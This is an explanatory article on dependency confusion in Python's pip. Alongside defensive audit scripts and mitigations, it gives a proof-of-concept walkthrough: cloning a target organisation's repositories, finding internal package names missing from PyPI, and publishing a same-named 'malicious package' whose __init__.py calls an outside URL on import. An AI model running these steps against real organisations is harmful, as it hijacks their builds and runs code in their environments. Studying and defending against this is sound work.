Dependency confusion is a supply chain vulnerability that arises when a package manager installs a malicious package from a public repository instead of the intended private one. The issue is particularly prevalent in Python's package management system: when pip is configured with more than one index (for example through --extra-index-url), it does not prefer the private index and may install a same-named package from the public one. Exploiting this behavior can lead to severe consequences, including remote code execution (RCE) on target systems.
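To make the selection behavior concrete, here is a deliberately simplified model of how an installer that merges candidates from several indexes ends up with the public package. It is not pip's actual code; the index labels, version numbers, and the helper names `parse_version` and `pick_candidate` are hypothetical and exist only for illustration.

```python
# Simplified model of candidate selection across several indexes.
# This is NOT pip's implementation; index labels and versions are made up.


def parse_version(text):
    """Turn a plain dotted version such as '99.0.0' into a comparable tuple."""
    return tuple(int(part) for part in text.split("."))


def pick_candidate(candidates):
    """Return the (index, version) pair with the highest version.

    The index a candidate came from plays no role in the choice.
    """
    return max(candidates, key=lambda item: parse_version(item[1]))


candidates = [
    ("private-index", "1.4.2"),  # the real internal package
    ("public-index", "99.0.0"),  # a same-named package uploaded by a stranger
]

chosen = pick_candidate(candidates)
print(chosen)  # ('public-index', '99.0.0')
```

Because only the version is compared, anyone who can publish a higher version under the same name on any configured index wins the selection in this model.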
The typical workflow of a dependency confusion attack involves the following steps:
- Identifying Target Dependencies: Attackers search for requirements.txt files in public repositories to identify internal package names used by organizations.
- Verifying Package Availability: For each identified package, attackers check if it exists on the public Python Package Index (PyPI). This can be automated using tools like httpx to detect 404 responses, indicating the package is absent from PyPI.
- Publishing Malicious Packages: Attackers create and publish malicious packages on PyPI using the same names as the internal packages. These malicious packages can be designed to execute arbitrary code upon installation.
- Triggering Installation: When the target organization installs dependencies without strict index configurations, pip may fetch the malicious package from PyPI, leading to code execution within the organization's environment.
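The first two steps are also worth running against your own repositories, since any internal name that is unclaimed on PyPI is exposed. Below is a minimal sketch of such an audit using only the standard library. The function names are hypothetical, the parsing covers common requirements.txt lines rather than every form pip accepts, and the lookup assumes that PyPI's simple index at https://pypi.org/simple/<name>/ answers 404 for unregistered names.

```python
import re
import urllib.error
import urllib.request

# Project name at the start of a requirement line (letters, digits, . _ -).
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*")


def extract_names(requirements_text):
    """Return the sorted, de-duplicated project names in a requirements file."""
    names = set()
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line or line.startswith("-"):  # skip blanks and pip options
            continue
        # Skip bare URLs such as git+https://...; keep "name @ https://..." lines.
        if "://" in line and "@" not in line.split("://")[0]:
            continue
        match = NAME_RE.match(line)
        if match:
            # Normalise names: lowercase, runs of - _ . collapse to a single -
            names.add(re.sub(r"[-_.]+", "-", match.group(0)).lower())
    return sorted(names)


def exists_on_pypi(name, timeout=10):
    """Return True if the public simple index has a page for this name."""
    url = f"https://pypi.org/simple/{name}/"
    try:
        with urllib.request.urlopen(url, timeout=timeout):
            return True
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise  # anything else (rate limiting, outage) needs a human look


def unclaimed_names(requirements_text, exists=exists_on_pypi):
    """Names used in the file that nobody has registered on the public index."""
    return [name for name in extract_names(requirements_text) if not exists(name)]
```

Calling `unclaimed_names(open("requirements.txt").read())` performs one HTTP request per name. The `exists` parameter can be swapped for a lookup against an internal inventory or a stub when testing offline.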
The repository provides a PoC demonstrating this attack vector:
- Cloning Target Repositories: Utilize tools like ghorg to clone all repositories from a target organization.
ghorg clone <target_organization> -t <personal_access_token>
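- Extracting Dependencies: Search for requirements.txt files, extract the package names, and list those that return a 404 on PyPI.
# Strip comments, leading whitespace, and everything after the package name;
# drop blank lines and pip options such as -r or --index-url.
find . -type f -name requirements.txt -exec cat {} + | \
sed -e 's/#.*//' -e 's/^[[:space:]]*//' -e 's/[][><=~!;@[:space:]].*//' | \
grep -vE '^(-|$)' | \
sort -u | \
xargs -I{} curl -s -o /dev/null -w "%{http_code} https://pypi.org/project/{}/\n" https://pypi.org/project/{}/ | \
grep "^404"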
- Creating Malicious Packages: For each vulnerable package:
$ mkdir <package-name>
$ cd <package-name>
$ mkdir <package-name>
$ cd <package-name>
$ touch __init__.py
- Insert malicious code into __init__.py (this code runs when the package is imported):
import requests
# Example: Send a request to a monitoring URL
requests.get("https://example.com/notify")
- Save the file and return to the parent directory:
$ cd ..
- Create setup.py with appropriate metadata:
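Note: The version of the published package must satisfy the version required for the vulnerable package. If the requirement is pinned exactly, the versions must be the same; otherwise pip installs the highest matching version it finds across all configured indexes.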
from setuptools import setup, find_packages
setup(
name="<package-name>",
version="0.0.1",
author="Attacker Name",
author_email="<author-email>",
description="Malicious package for dependency confusion attack",
packages=find_packages(),
install_requires=['requests'],
)
- Build and upload the package to PyPI:
$ python3 setup.py sdist bdist_wheel
$ pip3 install twine
$ twine upload dist/*
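To protect against dependency confusion attacks:
- Configure Package Indexes: Point pip at a single private index with --index-url and have that index proxy or mirror the public packages you need. Avoid --extra-index-url for private packages: pip treats all configured indexes equally and installs the highest matching version from any of them, so it does not prioritize the private repository.
- Implement Package Scopes: Follow PEP 708, which proposes extensions to the repository API so that installers can tell when the same project name on several indexes is meant to refer to the same project. Check the current level of support in pip and in your repository before relying on it.
- Monitor and Audit Dependencies: Regularly scan dependencies for anomalies, make sure every internal package is served from the private repository, and consider reserving internal names on PyPI so that nobody else can publish under them.
- Use Dependency Management Tools: Utilize tools like Thoth to manage and resolve dependencies securely.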
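Some of these checks can be automated in CI. The sketch below flags three things in a requirements file: use of --extra-index-url, requirements that are not pinned with ==, and requirements without a --hash option (pip verifies hashes when they are present or when --require-hashes is set). The function name `audit_requirements` and the message wording are hypothetical, and the checks are simple string tests, not a full parser.

```python
import re


def audit_requirements(requirements_text):
    """Return (line, message) findings for one requirements file."""
    # Join backslash-continued lines so each requirement is one logical line.
    text = re.sub(r"\\\r?\n", " ", requirements_text)
    findings = []
    for raw in text.splitlines():
        # A '#' at line start or after whitespace begins a comment.
        line = re.sub(r"(^|\s)#.*$", "", raw).strip()
        if not line:
            continue
        if line.startswith("--extra-index-url"):
            findings.append(
                (line, "extra index configured; candidates from all indexes are merged")
            )
        elif line.startswith("-"):
            continue  # other pip options are out of scope for this sketch
        else:
            if "==" not in line:
                findings.append((line, "not pinned to an exact version"))
            if "--hash=" not in line:
                findings.append((line, "no --hash; artifact contents are not verified"))
    return findings


if __name__ == "__main__":
    example = "--extra-index-url https://pypi.org/simple\nacme-lib>=1.0\n"
    for line, message in audit_requirements(example):
        print(f"{line}: {message}")
```

A non-empty result can be used to fail the build. The design choice here is to report rather than rewrite, so that a person decides how each finding is resolved.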
Dependency confusion poses a significant risk to software supply chains. By understanding the attack vectors and implementing robust dependency management practices, organizations can mitigate the threat and secure their development environments.
If you have any queries, you can always contact me on LinkedIn.